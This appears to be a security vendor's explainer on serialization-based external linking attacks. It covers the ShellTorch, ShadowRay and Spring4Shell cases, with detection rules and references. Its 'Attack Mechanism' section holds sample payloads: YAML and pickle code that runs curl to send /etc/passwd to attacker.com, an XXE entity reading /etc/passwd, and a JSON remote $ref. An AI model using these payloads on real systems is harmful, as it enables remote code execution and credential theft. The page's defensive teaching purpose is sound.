Skip to content

Serialized Data External Linking

Serialized Data External Linking is a subtechnique of Request Forgery where attackers exploit serialization mechanisms to force applications into loading or processing data from external sources. This technique is particularly dangerous in modern applications that use serialization formats like YAML, JSON, or XML for configuration and data exchange. When successful, external linking attacks can lead to remote code execution, data exfiltration, or service compromise by tricking applications into processing malicious external resources.

Examples in the Wild

Notable External Linking Attacks:

ShellTorch (CVE-2023-43654) The ShellTorch attack demonstrated sophisticated exploitation of external linking in PyTorch's TorchServe framework. Attackers exploited YAML deserialization to load malicious external resources, achieving remote code execution and data exfiltration:

  • Affected major cloud AI platforms (Google Cloud AI, AWS SageMaker, Azure ML)
  • Exploited model configuration loading
  • Chained with SSRF for enhanced impact
  • Led to widespread model and data theft

ShadowRay Attack The ShadowRay attack leveraged external linking in Ray's distributed training infrastructure to: - Load malicious model configurations - Access sensitive training data - Exfiltrate proprietary models - Compromise training pipelines

Spring Framework RCE (CVE-2022-22965) The Spring4Shell vulnerability demonstrated how external linking in data binding could lead to RCE: - Affected Spring Framework 5.3.0 to 5.3.17 - Exploited class loading mechanisms - Allowed arbitrary code execution - Impacted numerous enterprise applications

Attack Mechanism

Common External Linking Techniques:

  1. YAML External Entity Loading

    # Malicious YAML configuration
    model_config: !include http://attacker.com/malicious.yml
    
    # Or more directly:
    !!python/object/apply:os.system
    - 'curl http://attacker.com/exfil?data=$(cat /etc/passwd)'
    

  2. XML External Entity (XXE)

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE data [
        <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <config>
        <setting>&xxe;</setting>
    </config>
    

  3. JSON Schema Reference

    {
        "$schema": "http://attacker.com/schema.json",
        "type": "object",
        "properties": {
            "malicious": {
                "$ref": "http://attacker.com/payload.json"
            }
        }
    }
    

  4. Python Pickle Exploitation

    # Malicious pickle payload
    class Evil:
        def __reduce__(self):
            return (os.system, ('curl http://attacker.com/exfil?data=$(cat /etc/passwd)',))
    
    # Serialized and sent to target
    payload = pickle.dumps(Evil())
    

Detection Challenges

Why Traditional Security Tools Fail:

  1. Format Diversity

    # Multiple serialization formats
    data_formats:
      - yaml: "complex resolution"
      - xml: "entity expansion"
      - json: "schema references"
      - pickle: "code execution"
      # How to handle all formats?
    

  2. Resolution Complexity

    # Resource resolution
    external_resources:
      - http: "remote loading"
      - file: "local access"
      - custom: "protocol handlers"
      # How to track resolution?
    

  3. Context Sensitivity

    # Context variations
    usage_contexts:
      - config_loading: "startup"
      - data_processing: "runtime"
      - api_requests: "dynamic"
      # When to validate?
    

Required Application Security Strategy:

# External linking protection
- rule: "Resource Resolution"
  condition: |
    data.contains_external_reference AND
    reference.source_not_trusted AND
    reference.protocol_dangerous
  severity: critical

# Format validation
- rule: "Format Security"
  condition: |
    format.allows_code_execution OR
    format.enables_file_access OR
    format.permits_network_calls
  severity: high

# Runtime protection
- rule: "Runtime Control"
  condition: |
    runtime.loading_external_resource OR
    runtime.resolving_reference OR
    runtime.executing_loaded_code
  severity: critical

Key Detection Requirements:

  1. Resource Validation
  2. Source verification
  3. Protocol restriction
  4. Content validation

  5. Format Control

  6. Safe deserialization
  7. Reference limitation
  8. Execution prevention

  9. Runtime Monitoring

  10. Resource loading tracking
  11. Reference resolution logging
  12. Execution context validation
References & Resources

Official Sources:

  1. OWASP Deserialization Cheat Sheet
  2. MITRE CWE-502
  3. PyYAML Security

Technical Analysis:

  1. SnakeYAML Security
  2. Python Pickle Security
  3. JSON Schema Security